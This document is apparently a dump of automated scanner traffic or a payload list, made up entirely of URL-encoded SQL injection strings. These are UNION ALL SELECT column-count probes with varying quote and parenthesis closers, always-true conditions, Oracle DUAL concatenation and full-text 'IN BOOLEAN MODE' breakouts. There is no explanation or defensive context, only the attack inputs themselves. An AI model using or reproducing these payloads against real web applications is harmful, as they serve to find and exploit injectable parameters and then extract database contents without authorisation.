1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%206441%3D6441%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%209972%3D9972%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%206789%3D6789%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%203510%3D3510%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%204484%3D4484%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%204940%3D4940%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%207090%3D7090%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%203645%3D3645%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%209423%3D9423%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20WHERE%203736%3D3736%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%202417%3D2417%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%206324%3D6324%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%201225%3D1225%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%206404%3D6404%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%203520%3D3520%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%205730%3D5730%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%209673%3D9673%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%206605%3D6605%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%202887%3D2887%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20WHERE%208971%3D8971%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%203812%3D3812%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%209747%3D9747%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%208110%3D8110%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%201195%3D1195%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%203003%3D3003%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%204681%3D4681%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%206042%3D6042%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%207357%3D7357%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%207806%3D7806%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20WHERE%202307%3D2307%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%204910%3D4910%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%207851%3D7851%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%209705%3D9705%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%202842%3D2842%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%208827%3D8827%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%207031%3D7031%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%208400%3D8400%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%205203%3D5203%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%201331%3D1331%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%206772%3D6772%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27jYhM%27%20FROM%20DUAL%20WHERE%203917%3D3917%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27puNo%27%20FROM%20DUAL%20WHERE%207357%3D7357%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27SrQT%27%20FROM%20DUAL%20WHERE%205832%3D5832%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27uUSa%27%20FROM%20DUAL%20WHERE%208685%3D8685%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27JSEA%27%20FROM%20DUAL%20WHERE%206987%3D6987%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27xcUc%27%20FROM%20DUAL%20WHERE%203398%3D3398%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27Mdra%27%20FROM%20DUAL%20WHERE%208642%3D8642%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27XypT%27%20FROM%20DUAL%20WHERE%209816%3D9816%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27IXcj%27%20FROM%20DUAL%20WHERE%203339%3D3339%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27miHv%27%20FROM%20DUAL%20WHERE%202497%3D2497%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27lWAC%27%20WHERE%204884%3D4884%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27hDBJ%27%20WHERE%209477%3D9477%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27ZyoC%27%20WHERE%204526%3D4526%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27sEOo%27%20WHERE%202300%3D2300%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27HkRD%27%20WHERE%208183%3D8183%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27gcuG%27%20WHERE%202324%3D2324%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27rZMm%27%20WHERE%209935%3D9935%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27ukjx%27%20WHERE%209861%3D9861%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27Auqg%27%20WHERE%204593%3D4593%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27WMuB%27%20WHERE%205329%3D5329%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20vwOI%20WHERE%206989%3D6989%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20TwXx%20WHERE%206728%3D6728%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20ssdC%20WHERE%209823%3D9823%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20bvRO%20WHERE%201434%3D1434%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20QFAV%20WHERE%202866%3D2866%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20oeFc%20WHERE%202942%3D2942%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20dZcO%20WHERE%206134%3D6134%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20hIfc%20WHERE%209279%3D9279%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20Gmly%20WHERE%208813%3D8813%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20vXIR%20WHERE%201994%3D1994%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27BaJx%27%20WHERE%202229%3D2229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27DLjt%27%20WHERE%207562%3D7562%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27AEjC%27%20WHERE%206788%3D6788%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27fpNS%27%20WHERE%205456%3D5456%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27gsTW%27%20WHERE%208812%3D8812%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27amxR%27%20WHERE%204379%3D4379%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27ctbJ%27%20WHERE%205141%3D5141%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27JQik%27%20WHERE%203312%3D3312%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27EdvF%27%20WHERE%207241%3D7241%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27FDsF%27%20WHERE%205804%3D5804%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -3490%29%20UNION%20ALL%20SELECT%206318%2C6318%2C6318%2C6318%2C6318%2C6318%2C6318%2C6318%2C6318%2C6318%2C6318--%20 -1809%29%20UNION%20ALL%20SELECT%207323%2C7323%2C7323%2C7323%2C7323%2C7323%2C7323%2C7323%2C7323%2C7323%2C7323%2C7323--%20 -3877%29%20UNION%20ALL%20SELECT%201440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440--%20 -5364%29%20UNION%20ALL%20SELECT%204907%2C4907%2C4907%2C4907%2C4907%2C4907%2C4907%2C4907%2C4907%2C4907%2C4907%2C4907%2C4907%2C4907--%20 -4710%29%20UNION%20ALL%20SELECT%209520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520%2C9520--%20 -3620%29%20UNION%20ALL%20SELECT%207519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519%2C7519--%20 -2771%29%20UNION%20ALL%20SELECT%205672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672%2C5672--%20 -3047%29%20UNION%20ALL%20SELECT%203973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973%2C3973--%20 -5849%29%20UNION%20ALL%20SELECT%205075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075%2C5075--%20 -7308%29%20UNION%20ALL%20SELECT%208968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968%2C8968--%20 -6683%29%20UNION%20ALL%20SELECT%206721%2C6721%2C6721%2C6721%2C6721%2C6721%2C6721%2C6721%2C6721%2C6721%2C6721--%20 -4196%29%20UNION%20ALL%20SELECT%206747%2C6747%2C6747%2C6747%2C6747%2C6747%2C6747%2C6747%2C6747%2C6747%2C6747%2C6747--%20 -3537%29%20UNION%20ALL%20SELECT%204565%2C4565%2C4565%2C4565%2C4565%2C4565%2C4565%2C4565%2C4565%2C4565%2C4565%2C4565%2C4565--%20 -1131%29%20UNION%20ALL%20SELECT%201878%2C1878%2C1878%2C1878%2C1878%2C1878%2C1878%2C1878%2C1878%2C1878%2C1878%2C1878%2C1878%2C1878--%20 